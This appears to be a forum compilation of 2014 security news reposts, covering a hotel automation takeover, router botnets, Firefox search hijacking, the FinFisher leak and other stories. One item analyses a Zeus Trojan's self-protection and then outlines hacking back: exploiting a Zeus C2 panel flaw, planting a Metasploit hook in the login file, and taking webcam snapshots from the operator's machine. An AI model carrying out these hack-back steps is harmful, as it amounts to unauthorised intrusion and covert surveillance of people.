Hacking Expert 'Took Control Of 200 Hotel Rooms' A security consultant gains control of the lights, blinds and temperature systems of 200 luxury hotel rooms in China. A computer expert took control of 200 luxury hotel rooms after spotting a security flaw in his complimentary in-room iPad. Security consultant Jesus Molina was staying in the five-star St Regis hotel in the Chinese city of Shenzhen, when he said he got bored one evening. He started to play around with the in-room iPad and reverse-engineered an insecure home automation protocol called KNX/IP. By doing so, he was able to control lights, blinds, temperature and other things in his room. He discovered that by changing the last digit of the device's IP address he could take over other devices elsewhere in the hotel. Following that discovery, Mr Molina mapped out the IP addresses for rooms in the rest of the hotel using a computer script he had written. Speaking at the Black Hat hacking conference in Las Vegas, he said: "I thought about looking to see if a similar system controlled the door locks but got scared." After the discovery, he got in touch with the hotel's parent company to highlight the flaw. It is understood that the loophole has now been closed. He told the audience at his talk - called Learn How To Control Every Room At A Luxury Hotel Remotely - that he "did not hack" the system. Instead he said he simply "abused" the KNX protocol, which was created back in the early 90s. Sursa: Hacking Expert 'Took Control Of 200 Hotel Rooms'

Security expert calls home routers a clear and present danger In Black Hat Q&A, In-Q-Tel CISO says home routers are "critical infrastructure." by Sean Gallagher - Aug 7 2014, 4:12am GTBST LAS VEGAS—During his keynote and a press conference that followed here at the Black Hat information security conference, In-Q-Tel Chief Information Security Officer Dan Geer expressed concern about the growing threat of botnets powered by home and small office routers. The inexpensive Wi-Fi routers commonly used for home Internet access—which are rarely patched by their owners—are an easy target for hackers, Geer said, and could be used to construct a botnet that "could probably take down the Internet." Asked by Ars if he considered home routers to be the equivalent of critical infrastructure as a security priority, he answered in the affirmative. Geer spoke about the threat posed by home routers in advance of "SOHOpelessly Broken," a router hacking contest scheduled for the DEF CON security conference later this week sponsored by the Electronic Frontier Foundation. "Because they are so cheap, you can get a low-end router for less than 20 bucks that hasn't been updated in a while," Geer explained. Attackers could identify vulnerabilities in particular models and then scan the Internet for targets based on the routers' signatures. "They can then build botnets on the exterior of the network—the routing that it does is only on side facing ISPs," he said. "If I can build a botnet on the outside of the routers, I could probably take down the Internet." During his keynote, Geer had said that inexpensive routers were an example of the security risk of the "Internet of Things," because of their use of long-lived embedded software with no automatic way for vendors to distribute patches. "All embedded software should either have a remote management interface, orthey need a finite lifetime," he opined, "because if they live long enough, something bad will happen. If a person lives long enough, they will get dementia—if a piece of software lives long enough, it will be taken over." In response to a question during the following press conference, Geer admitted that remote management software for routers was a potential security risk in itself. "But absent that, there's a different set of risks," he added. By using "fuzzing"—sending bogus data to a device to try to cause a failure—Geer said that attackers could essentially discover "an unintended remote management interface. Unless you adopt [interface] strictures, it's very difficult to defend against bad inputs." Sursa: Security expert calls home routers a clear and present danger | Ars Technica

How to bypass Zeus Trojan’s self protection mechanism How to bypass Zeus Trojan’s self protection mechanism Spammers are good when it comes to intimidating users to open the attachment . One of the recent pathetic and cruel one was Hi A Person from your office was found dead outside . Please open the picture to see if you know him . Regards Attachment is basically a Zip file consisting of an exe file named “image.scr” with a nice mspaint icon . Quickly opening up in IDA will give us a hint that it is basically a VBpacker. VBPackers usually create a hallow suspended process , overwrite the memory and resume within . After successfully unpacking and fixing the dump we get the following output OEP the unpacked binary is enough to tell us that it is a Zeus Banking Trojan . Well this one is a different version of Zeus with self-protection which means unpacked ones wont run . This is usually done to “force” the bot masters to buy a Cryptor service . If you double click the binary it will not run , It will simply exit. Now lets see where things are going wrong and how to bypass the protection For that purpose we will generate an API call Graph made by the unpacked binary to see the exit point of program . So from this we got an idea that it is reading file buffer and performing some operations on it and now lets see what operation it is performing on it . Now if we dig deeper we find out the file buffer is read and the some cryptography operations are performed . And if go inside CheckSelfProtection() function we will observe that this function will RC4 the whole binary buffer with a static encryption key and will search for placeholder “DAVE” In my case the RC4 Key was Packer integrity We can copy that 0x200 byte data from the packer into the overlay of our unpacked file. And if found it goes further on verifying the integrity of that data structure and decodes another payload using a 4 byte XOR key taken from that structure. The Total size of the data Structure is 0x200 bytes and on the basis size, Installer and injector are decrypted . Let now understand the structure of that 0x200 Data Structure. During installation phase iSizeOfPacket bytes are copied from the data chunk into heap . And then later on used to decode installer subroutine using XOR cipher . struct Zeus_packer_overlay { DWORD SIGNATURE; SetBackColor( cRed ); DWORD Crc32HASH; SetBackColor( cBlue ); WORD iSizeOfPacket; unsigned int SizeOfDecodedData; unsigned int Unknown1; SetBackColor( cRed ); unsigned int XorKey; }Zeus_Packer_OverLay; Before decoding the installer routine CRC32 hash is checked and SizeOfDecodedData data is copied to heap location in this function. The installer and injector is differentiated by iSizeOfPacket field, if the size is 0x0c then it is still in installation phase if it is 0x1e6 then it has been replaced by installation routine with a new packer data structure . The installation subroutine is then decoded using Xorkey with a data buffer of size SizeOfDecodedData using this simple XOR function. During the installation phase the Packer data structure is rewritten and encrypted using RC4 resulting in data of length 0x1e6 which mainly consists of installation data like 1 : Registry Keys 2 : Random Numbers Generated for Seeding . 3 : Local Path Name 4 : Computer Name and Version Replacing this Packer Overlay data with the old one will let you skip the installation phase and binary wont be relaunched again using CreateProcessA in %appdata%. Yet we will have to patch a jump after it Compares its path in the overlay data with the current path. Owning a Zeus C2C panel / Spammer There exists a publicly known RCE vulnerability in some versions of Zeus ( as well as Zeus lite, KINS,ICE-IX) As described in detail here (Billy (BK) Rios » Turning the Tables – Part I) . Our good friend Xylitol has already provided a ready to use tool to exploit such vulnerability : CyberCrime All we need for that is C2C we address and RC4 communication key . Both of them you can get from Base Config Decoding Subroutine which is again based on simple XOR cipher After getting C2C and RC4 key . It can be submitted here to get a shell on that C2C web panel . Once you get the shell you can then edit the cp.php ( login file for Zeus panel ) and boost up your Metasploit exploit after the bot master has logged in . And if you know how to proceed further and you can get a meterpreter shell on the spammers machine . webcam_snap is one beautiful Meterpreter script command which I personally like ( http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics#webcam_snap) It takes a webcam capture from the victims computer and saves it in the target machine. And if you enter that , you might get back something like this in your computer Sursa: How to bypass Zeus Trojan’s self protection mechanism

[h=1]Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery[/h] August 7th, 2014, 07:17 GMT · By Silviu Stahie Qubes, an open source operating system designed to provide strong security for desktop computing, which is based on Xen, X Window System, and Linux and can run most Linux applications and utilize most of the Linux drivers, is now at version 2 RC2 and it's ready for testing. The Qubes distribution was built as a virtual stronghold and it should be one of the most secure operating systems available right now. It's not a Linux distribution for beginners and it requires users to get informed before using it, but it's all worth it once you understand how it actually works. The Qubes releases don't happen very often. In fact, the previous RC in the series was made available back in April and the development of the new branch actually started in 2013. “Today we're release the second release candidate (rc2) for Qubes OS R2. There are currently no more open tickets for the final R2 release, and we hope that what we release today is stable enough and so will be identical, or nearly identical, to the final R2 ISO, which we plan to release after the summer holidays.” “After Qubes rc1 release a few months ago we have been hit by a number of problems related to unreliable VM start-ups. The most prevalent problem has been traced down to an upstream bug in systemd, which just happened to be manifesting on Qubes OS due to specific conditions imposed by our startup scripts,” note the developers. The devs are also working on a Debian template for Qubes AppVMs, which can be installed with a simple command. It features GUI virtualization, secure clipboard, secure file copy, and other integration features, all of them working out of the box. Also, a “minimal” Fedora-based template can now be found in the Templates Appstore, the Wiki server has been moved to a bigger EC2 instance, and a number of themes for installer and plymouth have been provided by default. Keep in mind that, unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. Check out the official announcement for a complete list of updates and upgrade instructions. You can download Qubes 2 RC 2 right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only. [h=2]QUBES 2 RC2 - PHOTO GALLERY:[/h] [TABLE=class: news_index_hot] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [/TABLE] Sursa: Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery

[h=1]Oracle Solaris 11.2 Officially Released[/h] August 7th, 2014, 08:21 GMT · By Silviu Stahie Oracle Solaris, one of the most widely deployed UNIX operating systems, which delivers critical cloud infrastructure with built-in virtualization, simplified software lifecycle management, cloud scale data management, and advanced protection for public, private, and hybrid cloud environments, has finally reached version 11.2. It's hard to quantify just how many changes and improvements have been made for this release, but there are quite a lot. The developers have gathered numerous modifications and new features since the previous version, 11.1, which was made available back in October 2012. “Oracle Solaris 11.2 accelerates your ability to deploy enterprise cloud computing with an efficient, secure, compliant, open, and affordable cloud platform. Engineered for cloud and deeply integrated with Oracle Database, Java, and Oracle Applications, Oracle Solaris 11.2 is more than an operating system (OS).” “It combines a complete OpenStack distribution, application-driven software-defined networking (SDN), zero-overhead virtualization, enterprise-grade disaster recovery, and high availability with an enterprise-class OS to simplify and secure the delivery of mission-critical cloud services. Oracle Solaris is a strategic element in Oracle's growing systems business,” reads the official website. According to the changelog, the distribution is now able to provide an efficient, secure, compliant, open, and affordable path to enterprise cloud computing, the OS is open cloud platform engineered for large-scale enterprise cloud environments, it features OpenStack, it comes with application-driven SDN technology, clustering, and zero-overhead virtualization, and it should make the IT's transformation to enterprise-grade cloud simple, fast, and affordable. Also, the Unified Archive template and OpenStack distribution should provide a fast setup for a cloud environment, the compliance overhead is reduced with built-in compliance reporting and simple resolution instructions, built-in virtualization that delivers scalability at low cost has been implemented, multi-tier recovery from outages and disasters is available, and support for more than 30 common enterprise application suites, including new modules for Oracle's JD Edwards Enterprise One, is provided. Oracle took over the development of Solaris back in 2012 and they have turned the distribution into a powerful OS aimed at companies and firms with big infrastructure needs. This is a closed source proprietary operating system, but some bits from it do have open source components, which are provided on the official website. A comprehensive list of changes, features, and updates can be found in the official announcement. You can download Oracle Solaris 11.2 right now from Softpedia, but you will also have to create an account with Oracle in order to get the download links. Sursa: Oracle Solaris 11.2 Officially Released

[h=1]Russian Ministry of Health to Replace Microsoft and Oracle Products with Linux and PostgreSQL[/h] August 7th, 2014, 09:09 GMT · By Silviu Stahie The Russian government is considering the replacement of Microsoft and Oracle products with Linux and open source counterparts, at least for the Ministry of Health. Russia has been slapped with a large number of sanctions by the European Union and the United States, which means that they are going to respond. One of the ways they can do that is by stopping the authorities from buying Microsoft licenses or prolonging existing ones. According to a report published on gov.cnews.ru, the official website of the Russian government, the Ministry of Health intends to abandon all the proprietary software provided by Oracle and Microsoft and replace it with open source software. This information is revealed by the Deputy Director of the IT department of Ministry of Health, Roman Safronov. He says that this has been actually planned since 2011, with the creation of the federal services of the Unified State Health Information System (EGISZ). “Given the many transactions coming EGISZ scale and limited budget, we decided that we can not afford to pay for a license tens of millions of rubles a year,” says Safronov. “A large part of the Unified State Health Information System (EGISZ) works on open source software, "from the Linux terminal stations, the linux / unix servers to application software and databases (PostgreSQL, and others.)". Situation Centre of Ministry of Health is also built on open source software,” he continues. The migration to open source from Microsoft and Oracle products is not something that can be done rapidly. In fact, the advanced 2015 date seems to be way too early and it's doubtful that they will be able to migrate all of their systems to other databases and operating systems. Even if this decision of the Russian government seems to follow a trend from other administrations in Europe, it has little in common with them. Cities like Toulouse in France and Munich in Germany have worked for many years to cut costs by adopting open source solutions, but the Russians are just trying to punish American corporations and leverage their own kinds of sanctions. It's unclear whether this decision will also be implemented in other areas of the government, but that remains to be seen. Also, Roman Safronov says that they will use PostgreSQL instead of Oracle, but he fails to mention what Linux distribution will be used to replace Windows. They might try to use something built in Russia, but there are no major Linux operating systems developed in that country that can do the job. Sursa: Russian Ministry of Health to Replace Microsoft and Oracle Products with Linux and PostgreSQL

Firefox 34 to introduce better search hijacking protection By Martin Brinkmann on August 7, 2014 in Firefox - Last Update: August 7, 2014 0 Advertisement Mozilla plans to improve user protection against unwanted search engine manipulations in Firefox by changing the way search engine information are stored in the browser. Firefox users have to cope with unwanted changes made to the browser more than other users. When it comes to unwanted add-on and toolbar installations, and changes made to the homepage or search provider, it is Firefox that is affected the most by it. There are several reasons for that, one being that it is easy enough to manipulate certain preferences to modify homepage or search engine values. Search hijacking is a big issue right now. This usually happens during the installation of programs that ship with adware offers. If you are not careful, you may end up with a different search provider that is used for all browser searches from that moment on. While it is easy enough to switch back if you know how to, it can be a very frustrating experience, especially if the change is made regularly by a program running in the background. Mozilla plans to improve user protection against search hijacking in several ways in the near future. One effort will be integrated into Firefox 34. The preference browser.search.selectedEngine, which is currently being used to determine the default search engine in Firefox, will be removed as a consequence. The value of the preference will be saved in the file search-metadata.json instead which is stored in the user's profile directory. Since it would be relatively easy to replace that file, a hash is added to it as well which is generated from the profile directory name. This way companies cannot just replace the file with their own copy as the hash won't match. While there may be options to get around this, for instance by generating the hash as well, it is improving protection nevertheless. So what is happening if a program tries to change the default search provider in Firefox 34 or newer? The change is blocked. I installed the Ask Toolbar on my system and explicitly allowed it to change the default search provider. While the installation went fine, the search provider was not changed. The most likely explanation is that it was not changed because it tried to modify the preference browser.search.selectedEngine which is not in use anymore. Mozilla plans to make additional changes to improve the user experience further. Search engines added by add-ons will for instance be removed automatically if the add-on gets uninstalled in Firefox, and new guidelines will be added to make search engine changes using an API which in turn displays a notification to the user if the change should be made. Drawbacks The change will benefit users who run into troubles regularly in regards to third-party initiated changes of the browser's default search provider. The change introduces on major drawback, as it won't be possible anymore to sync the selected search engine with other installations. Search engines will still get synchronized if Firefox Sync is enabled, but it is up to the user to change the default search engine manually on all systems manually. The second drawback is that programs won't be able to change the search engine anymore even if the user wants that to happen. There are not any statistics for this and I think it is unlikely that many users want those changes to happen on their system but there may be some who do. Conclusion Mozilla has to do something about unwanted changes made to the configuration of the Firefox browser. It is unclear if the new way of storing the default search engine will be sufficient, or it if will only provide users with temporary protection until companies find a way to manipulate the search engine again. The feature is already integrated in the most recent Nightly versions of Firefox. Mozilla plans to ship it with Firefox 34. (via Sören) Sursa: Firefox 34 to introduce better search hijacking protection - gHacks Tech News

HTTPS as a ranking signal Posted: Wednesday, August 6, 2014 Tweet Cross-posted from the Webmaster Central Blog Security is a top priority for Google. We invest a lot in making sure that our services use industry-leading security, like strong HTTPS encryption by default. That means that people using Search, Gmail and Drive, for example, automatically have a secure connection to Google. Beyond our own stuff, we’re also working to make the Internet safer more broadly. A big part of that is making sure that websites people access from Google are secure. For instance, we have created resources to help webmasters prevent and fix security breaches on their sites. We want to go even further. At Google I/O a few months ago, we called for “ ” on the web. We’ve also seen more and more webmasters adopting HTTPS (also known as HTTP over TLS, or Transport Layer Security), on their website, which is encouraging. For these reasons, over the past few months we’ve been running tests taking into account whether sites use secure, encrypted connections as a signal in our search ranking algorithms. We’ve seen positive results, so we’re starting to use HTTPS as a ranking signal. For now it's only a very lightweight signal—affecting fewer than 1% of global queries, and carrying less weight than other signals such as high-quality content—while we give webmasters time to switch to HTTPS. But over time, we may decide to strengthen it, because we’d like to encourage all website owners to switch from HTTP to HTTPS to keep everyone safe on the web. In the coming weeks, we’ll publish detailed best practices (we’ll add a link to it from here) to make TLS adoption easier, and to avoid common mistakes. Here are some basic tips to get started: Decide the kind of certificate you need: single, multi-domain, or wildcard certificate Use 2048-bit key certificates Use relative URLs for resources that reside on the same secure domain Use protocol relative URLs for all other domains Check out our Site move article for more guidelines on how to change your website’s address Don’t block your HTTPS site from crawling using robots.txt Allow indexing of your pages by search engines where possible. Avoid the noindex robots meta tag If your website is already serving on HTTPS, you can test its security level and configuration with the Qualys Lab tool. If you are concerned about TLS and your site’s performance, have a look at Is TLS fast yet?. And of course, if you have any questions or concerns, please feel free to post in our Webmaster Help Forums. We hope to see more websites using HTTPS in the future. Let’s all make the web more secure! Posted by Zineb Ait Bahajji and Gary Illyes, Webmaster Trends Analysts Sursa: Google Online Security Blog: HTTPS as a ranking signal

Report: Android finally surpasses iOS in web traffic By Derek Walter Follow Greenbot | Aug 5, 2014 12:00 PM Android’s dominant market share is paying off in another area: mobile web traffic. According to a report from Net Marketshare, mobile devices powered by Android accounted for a larger share of browser usage than iPhones and iPads in July. The analytics company tracks usage data for operating systems, browsers, search engines, and other technologies. netmarketshare.com July web data traffic shows Android phones and tablets with a small lead over those powered by iOS. The edge was less than half a percentage point: iOS web usage in July was 44.19 percent while Android devices reported 44.62 percent. This marks the first time Google's mobile OS has surpassed Apple's in total worldwide mobile web usage, but it's only one report from one company. However, the data was nearly a full percentage point jump from June, when Android accounted for 43.75 percent of Internet traffic. The gain for Android was higher when the data was compared with the numbers from the beginning of the year, with such phones and tablets accounting for only 39 percent of traffic. Sursa: Report: Android finally surpasses iOS in web traffic | Greenbot

[h=1]Long Range Wireless Sensors for the Home-Area-Network[/h] July 19, 2014 By Matt Terndrup In the near future, we will all reside in households that contain hundreds of little devices intertwingled together with an easily connectable and controllable network of sensors. For years, projects have been appearing all around the world, like this wireless sensor system that anyone can build. [Eric] hopes his work will help bring the truly expansive Home-Area-Network (HAN) into fruition by letting developers build cheap, battery-powered, long-range wireless sensors. His method integrates with the pluggable OSGI architecture and home automation platform openHAB along with using an Arduino as the lower power, sensor node that is capable of utilizing many types of cheap sensors found online. [Eric]’s tutorial depicts a few examples of the possibilities of these open-source platforms. For instance, he shows what he calls a ‘Mailbox Sentinel’ which is a battery-powered mail monitoring device that uses a Raspberry Pi to play the infamous, and ancient AOL sound bite “you’ve got mail.” It will also send an email once the postman cometh. In addition, he lists other ideas such as a baby monitoring sentinel, a washer/dryer notification system, water leak detectors, and security implementations that blast a loud alarm if someone tries to break in. All of this potential for just around $20. The key to making this project work, as [Eric] states, is the MQTT binding that ties together the Ardiuno and openHAB platform. This allows for simple messages to be sent over the Ethernet connection which is often found in IoT devices. So all you developers out there go home and start thinking of what could be connected next! Because with this system, all you need is a couple of ten-spots and an internet plug, and you have yourself a strong foundation to build on top of. The rest is up to you. This open, connected device is [Eric's] entry for The Hackaday Prize. You can see his video demo after the break. We hope this inspires you to submit your own project to the contest! Sursa: Long Range Wireless Sensors for the Home-Area-Network

McAfee: Google and Facebook’s Erosion of Privacy is a Tragedy Phil Muncaster UK / EMEA News Reporter , Infosecurity Magazine Outspoken anti-virus pioneer John McAfee has hit out at Google, Facebook and the host of privacy infringing applications dominating the modern age, and called on users to lobby their politicians to better protect digital freedoms. Keynoting at the annual BSides event in Las Vegas this week, McAfee managed to cover everything from his long-running dispute with the Belizean government to yoga and smoking on live TV. However, the topic he explored in most depth was the “tragedy” of firms like Google and Facebook knowing “virtually everything about you”. “How did this happen to us? It happened because we did not give a shit. It happened because we allowed a technology to run away with itself and because it made our lives easier and more convenient we did not care,” argued McAfee. “You have lost your privacy and you’re losing more of it every day. With the loss of privacy you’re losing your freedom, and without freedom is there humanity? Is there any humankind that is not free?” There was also time for a not-so-subtle dig at Google executive chairman Eric Schmidt’s famously dismissive response to privacy fears, “If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place." “Many would have us believe that if you have nothing to fear – if you’re doing nothing wrong – why should you care about privacy?” said McAfee. “The truth is this. Without privacy, can’t there be freedom?” McAfee went further, urging users to “stand up for themselves” and contact their Congressional representatives with the simple message: “I want my privacy back”. The founder of the eponymous AV company, now a part of chip giant Intel, has a vested interest in talking about such issues. His new company, Future Tense Security Systems has produced a free software “awareness” product which allows users to understand what permissions they have given to their apps. Another project, Chadder, is advertised as a private messaging platform. The majority of McAfee’s 40 minute keynote was devoted to audience questions. In response to one he claimed the AV industry is dead. “It’s based on an algorithm which can’t possibly keep up with the malicious workings of human beings today,” he argued. “I think we’ve got to start taking responsibility ourselves for the things we are doing. If we’re not willing to sacrifice a little bit of our convenience to not use apps that we have to have because they provide a direct link through which God-knows-what can come in, then there’s nothing technology can do to help us.” Sursa: McAfee says Google and Facebook’s Erosion of Privacy is a Tragedy - Infosecurity Magazine

FireEye and Fox-IT have partnered to provide free keys designed to unlock systems infected by CryptoLocker. Please provide your email address [1] and an encrypted file [2] that has been encrypted by CryptoLocker. This portal will then email you a master decryption key along with a download link to our recovery program that can be used together with the master decryption key to repair all encrypted files on your system. Please note that each infected system will require its own unique master decryption key. So in case you have multiple systems compromised by CryptoLocker, you will need to repeat this procedure per compromised system. Notes: [1] Email addresses will not be used for marketing purposes, nor will they be in any way stored by FireEye or Fox?IT. [2] You should only upload encrypted files that do not contain any sensitive or personally identifiable information. Link: https://www.decryptcryptolocker.com/

Gamma FinFisher hacked: 40 GB of internal documents and source code of government malware published on Andre Meister am 06. August 2014, 17:23 in Überwachung / Keine Kommentare “Try before you buy! One free license key for the first taker!” A hacker claims to have hacked a network of the surveillance technology company Gamma International and has published 40 gigabytes of internal data. A Twitter account has published release notes, price lists – and source code. Malware researchers and human rights activists welcome the publication, Gamma itself refuses to comment. This is an english adaption of two German articles. Thanks to Anna and Kilian for their help on the translation. Yesterday, we reported that the Twitter account @GammaGroupPR is publishing internal documents of the offensive computer intrusion product suite FinFisher/FinSpy, developed by Gamma and marketed and sold to state actors around the world. A post on reddit with the same username claims: […] a couple days ago when I hacked in and made off with 40GB of data from Gamma’s networks. I have hard proof they knew they were selling (and still are) to people using their software to attack Bahraini activists, along with a whole lot of other stuff in that 40GB. Here’s a torrent of all the data. Please download and seed. Here’s a twitter feed where I’m posting some of the interesting stuff I find in there, starting off slow to build up rather than just publish all the worst shit at once. If this Tweet is accurate, the hacked server is finsupport.finfisher.com, but it was since taken down. Unfortunately, the Dropbox-accuont with the original Torrent-file is “temporarily disabled”, but we are happy to provide a mirror. (Magnet-Link) The following are some of the files that were leaked on the Twitter account: “FinSpy – the professional botnet C&C solution” Portable Document Format (PDF): Cyber solutions for the fight against crime (17 pages) FinSpy 3.00 – User Manual – 2011-06-05, by Stephan Oelkers (127 pages) FinSpyPC 4.51 (HotFix for 4.50) Release Notes – 2014-04-14 (14 pages) FinSpyMobile 4.51 Release Notes – 2014-04-14 (15 pages) Microsoft Excel: FinFisher Price list 2014 – 2013-12-16 (updated: 2014-01-24) FinFisher Products Extended Antivirus Test (Anti-Virus Results FinSpy PC 4.51) – 2014-04-04 Device Tests FinSpyMobile 4.51 – 2006-09-16 (updated: 2014-04-15) FinSploit Sales There is a zip archive “FinSploit Sales” with a text file and three videos. The README contains those Frequently Asked Questions: Q: Can you supply a list of the current exploits? A: Yes but we need to do this individually for each request as the available exploits change on a regular basis. Q: Can we name the supplier? A: Yes you can mention that we work with VUPEN here Q: How does the customer get the exploits? A: They will get access to a web-portal where they can then always download the available exploits Q: Can this be used to deploy other trojans than FinSpy? A: Yes, any exe file can be sent Q: Which Operating Systems do you cover? A: Currently the focus is on Windows Vista/7. Some exploits for XP are also available. At the moment there are no 0 day exploits for OSX, Linux or mobile platforms. Really close: Martin Münch (Gamma) and Chaouki Bekrar (VUPEN) last month. Source: @cBekrar. This further proves the close collaboration between german/swiss/british Gamma/FinSpy and the french exploit seller VUPEN. The limitation to Windows 7 and Vista seems outdated. Two years ago, we reported that FinSpy Mobile also exists for all common mobile systems (iOS, Android, BlackBerry, Windows Mobile and Symbian). And last year, internal slides showed that FinSpy was able to infect all major operating systems (Windows, Linux and Mac OS X). If the newly published files are unmodified, they were created in October 2011, only a few days before ISS (Intelligent Support Systems) World in the US,. Most likely this was the status for presenting it at this “Wiretappers Ball“, and since then the product range was expanded to all common systems. Here are the three videos that show how vulnerabilities in three common software types are exploited: Source code of FinFly Web Another trophy is source code of FinFly Web, which found its way the code hosting platform GitHub. A company brochure that was published by WikiLeaks as part of the SpyFiles three years ago describes it like this: FinFly Web is designed to provide remote and covert infection of a Target System by using a wide range of web-based attacks. FinFly Web provides a point-and-click interface, enabling the Agent to easily create a custom infection code according to selected modules. Target Systems visiting a prepared website with the implemented infection code will be covertly infected with the configured software. A video advertises its features, and other documents describe provide more details. Malware researcher: “This guy is a malware developer” Raphaël Vinot, a malware researcher from France, has since decompiled a few java class files to make the code more understandable. He told netzpolitik.org (as himself, not his employer): Yesterday, I just had a very fast look at the repository and decompiled a few class files. The website is a testing instance to show to the new clients what they can do. I don’t think there is anything particularly interesting in that code, but it is a very good platform to show to non-technical people what attackers can do and how it will look like in the wild. I am personally going to reuse it at cyptoparties. The most interesting thing I found is in the file SearchEnhancer.java, which references the website www.codito.de. This redirects to www.mushun.de, which in turn lists Martin J. Muench in the imprint. MJM used to work for Gamma GmbH and acted as a speaker for the company. This guy is a malware developer and has to be treated like one. I really hope the clients are going to be revealed soon-ish, but most especially detections and indicators so it will be possible to share them with companies and other partners in order to detect FinFisher in the wild. FinFisher: “We don’t want to comment on this” “@avast_antivirus was irresponsibly interfering with law enforcement investigations by detecting FinSpy 4.50? Already yesterday we called up the Munich telephone number on finfisher.com and asked them for comment. At first, they denied being FinFisher, but then admitted it, albeit refusing to comment. Today we called them again, and again the answer was: “We don’t want to comment on this.” This time around, they greeted us with “FinFisher here” instead of denying it at first. When we asked, if we could speak to Martin Muench, we were rejected again: netzpolitik.org: Is Mr. Muench available? I already talked to him before. FinFisher GmbH: You already talked to him before? netzpolitik.org: Yes, but that was a while ago. Maybe last year. FinFisher GmbH: Mr Muench is not in the house. netzpolitik.org: Not at all or just at the moment? FinFisher GmbH: […] netzpolitik.org: ? FinFisher GmbH: Definitely not now. We have heard rumors that Martin ‘MJM’ Muench does not work for Gamma/FinFisher anymore. If you have more information on this (or anything else on the topic): don’t hesitate to contact us! Human rights activist: “such techniques are not lawful” Eric King, Deputy Director of the UK-based charity that defends and promotes the right to privacy across the world, told netzpolitik.org: In the last few years, a spotlight has been shone on the secretive practice of government hacking. This completely unchecked area of intelligence collection amounts to some of the most intrusive forms of surveillance any government can conduct. FinFisher are one of the most aggressive companies to try and supply the worlds law enforcement agencies with such tools, but without public debate, and clear laws authorising their use – such techniques are not lawful. Privacy International and EFF have both filed lawsuits on behalf of activists who have been targeted by the Ethiopian government using FinFisher. Many more activists will have been targeted by repressive regimes, and surveillance companies like FinFisher must take responsibility for their role in that repression, and stop their damaging practices. Security researcher: “generally considered criminal behavior” Yesterday, Jacob Appelbaum, computer security researcher and hacker, told netzpolitik.org: This document release shows that those responsible for protecting our security are aware of bypasses for commonly advocated security technologies. As an example, anti-virus bypass, which is a well known issue – is compounded by the desire for certain attackers to ensure that bypassses are not fixed but rather exploited. There is a dual role here and the overall security of our computers is being subverted by this dual role – to protect and the desire to infect protection loses in service of attacking people. Furthermore, we see that these government customers are aware that FinFisher is defrauding companies and their users by abusing their branding, logos and names – something that is generally considered criminal behavior when done by any other actor on the internet. These exploitable issues in commonly used software – in our everyday telephones, personal computers and in our infrastructure – are problems that need to be fixed; rather than fixing them, they are being exploited and are left vulnerable for any attacker, regardless of motive. Today, Jacob Appelbaum adds: This larger release of 40GB of data raises many interesting questions – impersonating companies such as RealPlayer, Adobe, and others has been well documented by third parties; we now have further evidence of such attack vectors as well as the government officials who were party to this kind of fraud for their own benefit. We hope, that there are many more interesting things to be found in the 40 GB torrent download. Please post your findings in the comments. Sursa: https://netzpolitik.org/2014/gamma-finfisher-hacked-40-gb-of-internal-documents-and-source-code-of-government-malware-published/

No, si cum va functiona acel program? Prin magie?

[h=1]Focus Your Ears with The Visual Microphone[/h] August 6, 2014 By Adam Fabio Leave a Comment A Group of MIT, Microsoft, and Adobe researchers have managed to reproduce sound using video alone. The sounds we make bounce off every object in the room, causing microscopic vibrations. The Visual Microphone utilizes a high-speed video camera and some clever signal processing to extract an audio signal from these vibrations. Using video of everyday objects such as snack bags, plants, Styrofoam cups, and water, the team was able to reproduce tones, music and speech. Capturing audio from light isn’t exactly new. Laser microphones have been around for years. The difference here is the fact that the visual microphone is a completely passive device. No laser or special illumination is required. The secret is in the signal processing, which the team explains in their SIGGRAPH paper (pdf link). They used a complex steerable pyramid along with wavelet filters to obtain local pixel motion values. These local values are averaged into a global motion value. From this global motion value the team is able to measure movement down to 1/1000 of a pixel. Plenty of resolution to decode audio data. Most of the research is performed with high-speed video cameras, which are well outside the budget of the average hacker. Don’t despair though, the team did prove out that the same magic can be performed with consumer cameras, albeit with lower quality results. The team took advantage of the rolling shutter found in most of today’s CMOS imager based consumer cameras. Rolling shutter CMOS sensors capture images one row at a time. Each row can be processed in a similar fashion to the frames of the high-speed camera. There are some inter-frame gaps when the camera isn’t recording anything though. Even with the reduced resolution, it’s easy to pick out “Mary had a little lamb” in the video below. We’re blown away by this research, and we’re sure certain organizations will be looking into it for their own use. Don’t pull out your yet though. Foil containers proved to be one of the best sound reflectors. Thanks [Zach]! Sursa: Focus Your Ears with The Visual Microphone

